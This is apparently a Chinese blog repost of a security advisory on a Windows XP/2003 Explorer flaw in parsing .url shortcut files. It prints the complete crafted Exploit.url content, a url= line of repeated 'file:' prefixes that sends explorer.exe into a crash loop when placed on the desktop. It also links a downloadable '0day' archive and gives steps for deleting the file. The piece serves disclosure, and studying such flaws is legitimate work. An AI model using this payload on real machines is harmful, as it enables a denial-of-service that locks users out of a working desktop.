本文披露了一个仅影响Windows XP系统的安全漏洞。该漏洞出现在Windows Explorer处理URL文件时,通过特制的URL文件格式可以触发explorer.exe崩溃。用户在桌面上创建特定格式的Exploit.url文件后会导致系统不断崩溃。
10多天前就拿到了这个漏洞,这次看到bugtraq也公开了
只在xp下有效
Windows Explorer URL File format overflow
Affected Vendor:
Microsoft
Affected Products:
WindowsXP ALL
Windows2003 ALL
Vulnerability Details:
When explorer.exe parsing *.url file which contains a url as follows format will /
cause explorer.exe crash.
if you create the Exploit.url on Desktop
Explorer will Crash...Crash...Crash...Crash...Crash...Crash...
if you will del exploit.url
open taskmgr.exe
open cmd.exe
then cd your desktop
del exploit.url
Exploit:
[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:fi /
le:file:file:file:file:file:file:file:file:file:file:file:
Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P
http://hitcon.org
http://www.chroot.org
扫一扫
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
